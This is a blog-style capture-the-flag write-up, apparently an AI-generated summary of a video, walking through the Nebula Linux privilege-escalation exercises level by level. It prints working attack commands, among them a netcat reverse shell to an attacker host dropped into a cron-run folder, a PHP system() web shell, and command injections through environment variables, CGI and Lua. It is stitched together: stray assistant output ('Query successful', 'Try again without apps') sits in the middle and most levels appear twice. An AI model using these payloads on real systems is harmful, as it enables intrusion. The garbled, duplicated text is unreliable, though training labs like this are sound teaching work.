Nebula Level 08 Description

World readable files strike again. Check what that user was up to, and use it to log into flag08 account. To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08.

Nebula Exploit Exercises: Linux Privilege Escalation

I went through the Nebula exploit exercises, which are designed for beginners looking to learn Linux privilege escalation. I tackled levels 00 through 12, demonstrating various techniques to gain higher privileges on the system.

For my setup, I explained how to download the Nebula ISO and import it into VMware Workstation. I used two terminal tabs: one for SSHing into the Nebula VM and another as a local listener for potential reverse shells.

Level 00: Finding a SetUID Program

My first task was to find a Set User ID (SUID) program that runs as the flag00 account. I used the following command to find SUID programs across the entire filesystem, redirecting errors to /dev/null:

  • find / -perm -u=s -type f 2>/dev/null

Once I identified the target binary owned by flag00, I simply executed it directly to solve the challenge. I confirmed success with the getflag command, which I used throughout the levels.

Level 01: Exploiting Environment Variables (Path Manipulation)

In this level, I exploited a program that had a vulnerability allowing arbitrary program execution due to how it called the echo command. The program called echo without specifying its full path, relying on the system’s PATH environment variable.

My exploitation steps were:

  1. I created a custom version of echo that was a symbolic link to getflag using: ln -s /bin/getflag echo.
  2. I navigated to a directory I controlled, like /tmp.
  3. I then prepended this directory to the PATH environment variable: export PATH=/tmp:$PATH. This ensured my custom echo would be found first.
  4. Finally, I executed the vulnerable flag01 binary. This ran my custom echo (which was getflag) with the privileges of flag01.

Level 02: Exploiting Environment Variables (Command Injection via getenv)

Here, I exploited a program that used getenv to fetch an environment variable’s value and then used that value in a system() call. The vulnerability was that the program retrieved the value of the USER environment variable and incorporated it into a command executed by system().

To exploit this, I modified the USER environment variable to include a command, using a semicolon for command chaining:

  • export USER=';/bin/getflag;'

The semicolons effectively terminated the existing command structure in the C code, allowing getflag to be executed as a new command. Then, I simply ran the flag02 binary.

Level 03: Exploiting a Writable Cron Job Script

This level involved leveraging a cron job that executed scripts from a world-writable directory. The vulnerability was a script (writable.sh) that ran periodically via cron and executed any files found in a specific directory (writable.d).

My exploitation steps were:

  1. I created a script in the writable.d directory to establish a reverse shell. I used a netcat one-liner:
    • echo 'nc -e /bin/bash <attacker_IP> <attacker_port>' > /home/flag03/writable.d/shell.sh
  2. I made the script executable: chmod +x /home/flag03/writable.d/shell.sh.
  3. Then, I waited for the cron job to execute the script, which connected back to my listener as flag03. Once the shell was received, I ran getflag.

Level 04: Bypassing File Access Restrictions with Symbolic Links

My goal here was to read a restricted token file. The flag04 program had a check that prevented directly accessing a file named “token.”

To bypass this, I created a symbolic link in /tmp that pointed to the actual token file but with a different name:

  • ln -s /home/flag04/token /tmp/level04

Then, I ran the flag04 program, providing the symbolic link as the argument:

  • /home/flag04/flag04 /tmp/level04

This successfully bypassed the name check, and the program read the token file’s content. I then used the retrieved token as the password for the flag04 user.

Level 05: Exploiting Weak Directory Permissions (SSH Private Key)

This level focused on exploiting weak directory permissions to find an SSH private key. The vulnerability was a backup directory (.backup) containing a compressed file with an SSH private key. While direct extraction might be restricted, the file could be copied.

My exploitation steps were:

  1. I copied the compressed backup file to /tmp: cp /home/flag05/.backup/backup.tar.gz /tmp/.
  2. I then extracted the archive in /tmp: tar -zxvf backup.tar.gz.
  3. This revealed an id_rsa (private key) file.
  4. I then used this private key to SSH into the flag05 account: ssh -i /path/to/id_rsa flag05@localhost. (I noted an issue with my VM preventing successful login via this method, but it should generally work).

Level 06: Cracking Password Hashes from /etc/passwd

Here, my goal was to crack a user’s password hash found in /etc/passwd on a legacy system. The vulnerability was that legacy Unix systems might store password hashes directly in /etc/passwd.

My exploitation steps were:

  1. I viewed the /etc/passwd file: cat /etc/passwd.
  2. I identified and copied the line containing the hash for flag06.
  3. I then used John the Ripper on my attacker machine to crack the hash: john --show name_of_file_with_hash.
  4. Finally, I used the cracked password (“hello”) to switch to the flag06 user.

Level 07: Command Injection in a Perl CGI Script

This level involved exploiting command injection in a Perl CGI script that pinged hosts. The vulnerability was that the script took a host as input and used it directly in a ping command without proper sanitization.

My exploitation steps were:

  1. I initially tested command chaining locally: ./index.cgi host=<attacker_IP>;ls.
  2. Since the web server running the CGI script ran as flag07, I used wget to make the web server execute the script with my payload. I had to URL encode the semicolon (%3B):
    • wget "http://localhost:7070/index.cgi?host=127.0.0.1%3Bgetflag" -O /tmp/output
  3. The output containing the getflag result was saved to /tmp/output, which I then viewed with cat /tmp/output. I also mentioned that I sometimes had to restart the Nebula machine because the web server would die.
  • Query successful

Try again without apps

I’ve summarized the video on the Nebula exploit exercises, focusing on Linux privilege escalation techniques. I’ve used a conversational tone with “I” and extracted the technical commands for each level.


Nebula Exploit Exercises: Linux Privilege Escalation

I went through the Nebula exploit exercises, which are designed for beginners looking to learn Linux privilege escalation. I tackled levels 00 through 12, demonstrating various techniques to gain higher privileges on the system.

For my setup, I explained how to download the Nebula ISO and import it into VMware Workstation. I used two terminal tabs: one for SSHing into the Nebula VM and another as a local listener for potential reverse shells.


Level 00: Finding a SetUID Program

My first task was to find a Set User ID (SUID) program that runs as the flag00 account. I used the following command to find SUID programs across the entire filesystem, redirecting errors to /dev/null:

  • find / -perm -u=s -type f 2>/dev/null

Once I identified the target binary owned by flag00, I simply executed it directly to solve the challenge. I confirmed success with the getflag command, which I used throughout the levels.


Level 01: Exploiting Environment Variables (Path Manipulation)

In this level, I exploited a program that had a vulnerability allowing arbitrary program execution due to how it called the echo command. The program called echo without specifying its full path, relying on the system’s PATH environment variable.

My exploitation steps were:

  1. I created a custom version of echo that was a symbolic link to getflag using: ln -s /bin/getflag echo.
  2. I navigated to a directory I controlled, like /tmp.
  3. I then prepended this directory to the PATH environment variable: export PATH=/tmp:$PATH. This ensured my custom echo would be found first.
  4. Finally, I executed the vulnerable flag01 binary. This ran my custom echo (which was getflag) with the privileges of flag01.

Level 02: Exploiting Environment Variables (Command Injection via getenv)

Here, I exploited a program that used getenv to fetch an environment variable’s value and then used that value in a system() call. The vulnerability was that the program retrieved the value of the USER environment variable and incorporated it into a command executed by system().

To exploit this, I modified the USER environment variable to include a command, using a semicolon for command chaining:

  • export USER=';/bin/getflag;'

The semicolons effectively terminated the existing command structure in the C code, allowing getflag to be executed as a new command. Then, I simply ran the flag02 binary.


Level 03: Exploiting a Writable Cron Job Script

This level involved leveraging a cron job that executed scripts from a world-writable directory. The vulnerability was a script (writable.sh) that ran periodically via cron and executed any files found in a specific directory (writable.d).

My exploitation steps were:

  1. I created a script in the writable.d directory to establish a reverse shell. I used a netcat one-liner:
    • echo 'nc -e /bin/bash <attacker_IP> <attacker_port>' > /home/flag03/writable.d/shell.sh
  2. I made the script executable: chmod +x /home/flag03/writable.d/shell.sh.
  3. Then, I waited for the cron job to execute the script, which connected back to my listener as flag03. Once the shell was received, I ran getflag.

Level 04: Bypassing File Access Restrictions with Symbolic Links

My goal here was to read a restricted token file. The flag04 program had a check that prevented directly accessing a file named “token.”

To bypass this, I created a symbolic link in /tmp that pointed to the actual token file but with a different name:

  • ln -s /home/flag04/token /tmp/level04

Then, I ran the flag04 program, providing the symbolic link as the argument:

  • /home/flag04/flag04 /tmp/level04

This successfully bypassed the name check, and the program read the token file’s content. I then used the retrieved token as the password for the flag04 user.


Level 05: Exploiting Weak Directory Permissions (SSH Private Key)

This level focused on exploiting weak directory permissions to find an SSH private key. The vulnerability was a backup directory (.backup) containing a compressed file with an SSH private key. While direct extraction might be restricted, the file could be copied.

My exploitation steps were:

  1. I copied the compressed backup file to /tmp: cp /home/flag05/.backup/backup.tar.gz /tmp/.
  2. I then extracted the archive in /tmp: tar -zxvf backup.tar.gz.
  3. This revealed an id_rsa (private key) file.
  4. I then used this private key to SSH into the flag05 account: ssh -i /path/to/id_rsa flag05@localhost. (I noted an issue with my VM preventing successful login via this method, but it should generally work).

Level 06: Cracking Password Hashes from /etc/passwd

Here, my goal was to crack a user’s password hash found in /etc/passwd on a legacy system. The vulnerability was that legacy Unix systems might store password hashes directly in /etc/passwd.

My exploitation steps were:

  1. I viewed the /etc/passwd file: cat /etc/passwd.
  2. I identified and copied the line containing the hash for flag06.
  3. I then used John the Ripper on my attacker machine to crack the hash: john --show name_of_file_with_hash.
  4. Finally, I used the cracked password (“hello”) to switch to the flag06 user.

Level 07: Command Injection in a Perl CGI Script

This level involved exploiting command injection in a Perl CGI script that pinged hosts. The vulnerability was that the script took a host as input and used it directly in a ping command without proper sanitization.

My exploitation steps were:

  1. I initially tested command chaining locally: ./index.cgi host=<attacker_IP>;ls.
  2. Since the web server running the CGI script ran as flag07, I used wget to make the web server execute the script with my payload. I had to URL encode the semicolon (%3B):
    • wget "http://localhost:7070/index.cgi?host=127.0.0.1%3Bgetflag" -O /tmp/output
  3. The output containing the getflag result was saved to /tmp/output, which I then viewed with cat /tmp/output. I also mentioned that I sometimes had to restart the Nebula machine because the web server would die.

Level 08: Analyzing Network Capture (Pcap) for Credentials

My goal here was to extract credentials from a provided .pcap file.

My method involved:

  1. Transferring the .pcap file from the Nebula machine to my attacker machine (e.g., using a simple Python HTTP server on Nebula and wget or a browser on the attacker machine). On Nebula, I used: python -m SimpleHTTPServer.
  2. Opening the .pcap file in Wireshark.
  3. Following the TCP stream of the relevant packets.
  4. Initially, the password appeared to be “backdoor…”, but by looking at the hex dump, I saw backspace characters (7F). By interpreting the backspaces, the actual password was deduced to be “backd0rm@”.
  5. I then used this password to switch to the flag08 user.

Level 09: PHP Command Execution via preg_replace with /e Modifier

In this level, I exploited a vulnerable PHP script executed by a SUID wrapper. The vulnerability was that the PHP script used preg_replace with the /e (evaluate) modifier, allowing PHP code execution if the input could be controlled. The file_get_contents function also took user-supplied input for the filename.

My exploitation steps were:

  1. I created a custom PHP file (e.g., in /tmp/level09.solution) with the content: <?php system($_GET['use_me']); ?>.
  2. I then ran the SUID wrapper (flag09), providing my custom PHP file as the first argument and the command to execute (getflag) as the second argument:
    • /home/flag09/flag09 /tmp/level09.solution getflag

Level 10 & 11: Skipped

I skipped Level 10 due to its “noisy” nature and the need for endless loops of bash scripts. I also skipped Level 11, mentioning a problem in the code.

Level 12: Command Injection in a Lua Script

My final challenge was to exploit command injection in a Lua script listening on a network port. The vulnerability was that a Lua script listened on port 50001. It took a password, hashed it, and compared it. Crucially, it used io.popen (similar to os.execute or system()) with the user-supplied password, leading to command injection.

My exploitation steps were:

  1. I connected to the listening port using netcat: nc 127.0.0.1 50001.
  2. When prompted for a password, I provided a payload that injected a command. I used backticks (`) for command substitution to execute getflag and redirect its output to a file in /tmp:
    • `getflag > /home/flag12/test2`
  3. The script executed this, and then I viewed the contents of the output file: cat /home/flag12/test2.

This concludes my detailed summary of the techniques and commands demonstrated in the video!

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles